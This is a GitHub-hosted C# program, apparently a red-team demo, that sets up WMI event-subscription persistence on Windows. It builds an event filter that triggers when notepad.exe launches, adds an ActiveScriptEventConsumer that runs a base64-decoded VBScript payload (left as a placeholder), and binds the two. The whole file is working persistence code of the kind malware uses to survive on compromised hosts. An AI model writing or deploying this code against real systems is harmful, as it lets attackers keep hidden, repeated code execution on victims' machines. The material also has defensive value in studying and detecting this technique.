Permalink
Cannot retrieve contributors at this time
Join GitHub today
GitHub is home to over 40 million developers working together to host and review code, manage projects, and build software together.
Sign up
Fetching contributors…
Cannot retrieve contributors at this time
| // WMI Event Subscription Peristence Demo | |
| // Author: @domchell | |
| using System; | |
| using System.Text; | |
| using System.Management; | |
| namespace WMIPersistence | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { | |
| PersistWMI(); | |
| } | |
| static void PersistWMI() | |
| { | |
| ManagementObject myEventFilter = null; | |
| ManagementObject myEventConsumer = null; | |
| ManagementObject myBinder = null; | |
| string vbscript64 = "<INSIDE base64 encoded VBS here>"; | |
| string vbscript = Encoding.UTF8.GetString(Convert.FromBase64String(vbscript64)); | |
| try | |
| { | |
| ManagementScope scope = new ManagementScope(@"\\.\root\subscription"); | |
| ManagementClass wmiEventFilter = new ManagementClass(scope, new | |
| ManagementPath("__EventFilter"), null); | |
| String strQuery = @"SELECT * FROM __InstanceCreationEvent WITHIN 5 " + | |
| "WHERE TargetInstance ISA \"Win32_Process\" " + | |
| "AND TargetInstance.Name = \"notepad.exe\""; | |
| WqlEventQuery myEventQuery = new WqlEventQuery(strQuery); | |
| myEventFilter = wmiEventFilter.CreateInstance(); | |
| myEventFilter["Name"] = "demoEventFilter"; | |
| myEventFilter["Query"] = myEventQuery.QueryString; | |
| myEventFilter["QueryLanguage"] = myEventQuery.QueryLanguage; | |
| myEventFilter["EventNameSpace"] = @"\root\cimv2"; | |
| myEventFilter.Put(); | |
| Console.WriteLine("[*] Event filter created."); | |
| myEventConsumer = | |
| new ManagementClass(scope, new ManagementPath("ActiveScriptEventConsumer"), | |
| null).CreateInstance(); | |
| myEventConsumer["Name"] = "BadActiveScriptEventConsumer"; | |
| myEventConsumer["ScriptingEngine"] = "VBScript"; | |
| myEventConsumer["ScriptText"] = vbscript; | |
| myEventConsumer.Put(); | |
| Console.WriteLine("[*] Event consumer created."); | |
| myBinder = | |
| new ManagementClass(scope, new ManagementPath("__FilterToConsumerBinding"), | |
| null).CreateInstance(); | |
| myBinder["Filter"] = myEventFilter.Path.RelativePath; | |
| myBinder["Consumer"] = myEventConsumer.Path.RelativePath; | |
| myBinder.Put(); | |
| Console.WriteLine("[*] Subscription created"); | |
| } | |
| catch (Exception e) | |
| { | |
| Console.WriteLine(e); | |
| } // END CATCH | |
| Console.ReadKey(); | |
| } // END FUNC | |
| } // END CLASS | |
| } // END NAMESPACE |